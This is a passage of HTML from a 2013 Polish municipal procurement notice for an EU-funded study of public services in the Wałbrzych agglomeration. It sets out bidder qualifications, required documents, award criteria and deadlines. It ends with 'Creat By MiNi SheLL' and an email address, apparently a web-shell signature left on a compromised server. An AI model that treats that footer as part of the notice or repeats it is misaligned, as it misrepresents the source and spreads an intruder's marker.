Opracowanie dokumentacji i przeprowadzenie szkoleń wraz z utworzeniem strony www w ramach projektu pn.: Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej dofinansowanego ze środków Unii Europejskiej  w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.  Wadium może być wnoszone również w innych formach zgodnie z art. 45, ust. 6 Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać się wykonaniem - w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie:
a) Co najmniej trzech usług, o łącznej wartości nie mniejszej niż 150 tys. zł brutto (polegających na przeprowadzeniu analizy/diagnozy lub opracowaniu raportu doradczego lub opracowaniu strategii rozwoju/funkcjonowania), w tym jedną usługą obejmującą grupę przynajmniej 3 jednostek samorządu terytorialnego w ramach jednorazowego zlecenia/umowy
oraz
b) Studiów wykonalności w zakresie: 
edukacja i szkolnictwo lub ochrona zdrowia lub kultura - co najmniej 1 studium;
gospodarka komunalna lub ochrona środowiska lub komunikacja - co najmniej 1 studium. Ocena spełnienia tego warunku będzie oceniana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się osobami przewidzianymi do realizacji zamówienia w szczególności: 
- przynajmniej jedną osobą z tytułem doktora posiadającym doświadczenie w zakresie analiz/ekspertyz związanych ze świadczeniem usług publicznych przez jednostki samorządu terytorialnego; 
- przynajmniej jedną osobą z tytułem doktora posiadającym doświadczenie w zakresie analizy/planowania rozwoju lokalnego;
- przynajmniej jedną osobą z tytułem doktora posiadającym doświadczenie w zakresie usług publicznych świadczonych przez jednostki samorządu terytorialnego;
- przynajmniej jedną osobą posiadającą praktyczną wiedzę i doświadczenie w zakresie Funduszy Strukturalnych. Ocena spełnienia tego warunku będzie oceniana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Proponowaną metodykę badań i techniki pomiaru Wykonawca przedstawi wraz z ofertą, na etapie składania oferty - będą one przedmiotem oceny Zamawiającego. 
2. Opis przebiegu działań badawczych wraz ze sposobem doboru i wielkości próby Wykonawca przedstawi wraz z ofertą, na etapie składania oferty - będą one przedmiotem oceny Zamawiającego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Metodyka badań i techniki pomiaru wraz z opisem przebiegu działań badawczych i sposobem doboru i wielkości próby - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza ewentualną zmianę następujących postanowień umownych:
- rozwiązania lub zmiany treści umowy o dofinansowanie Projektu, z której finansowane jest zamówienie;
- zmiany przepisów obowiązującego prawa mających wpływ na termin realizacji i wartość usługi;
- wystąpienia siły wyższej, jeżeli siła ta miałaby wpływ na termin realizacji zamówienia; 
- wniesienia przez Zamawiającego uwag do przedstawianych dokumentów (raport diagnostyczno-doradczy, system pomiaru usług, studia wykonalności) które mogą wpłynąć na niedotrzymanie przez Wykonawcę terminu realizacji;
- zmiany terminów realizacji poszczególnych zadań, na pisemny wniosek Wykonawcy wraz z uzasadnieniem, nie mający wpływu na ostateczny termin realizacji całego zadania będącego przedmiotem niniejszego postępowania. 
- osób wskazanych do wykonania zamówienia, pod warunkiem wyrażenia pisemnej zgody Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.walbrzych.pl/zzp/uslugipubliczne.zip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wałbrzychu, Pl. Magistracki 1, 
58-300 Wałbrzych, pok. Nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2013 godzina 10:00, miejsce: Urząd Miejski w Wałbrzychu, Pl. Magistracki 1, 
58-300 Wałbrzych, pok. Nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Usługi publiczne jako istotny czynnik rozwoju lokalnego w gminach Aglomeracji Wałbrzyskiej jest współfinansowany ze środków Unii Europejskiej i budżetu państwa w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com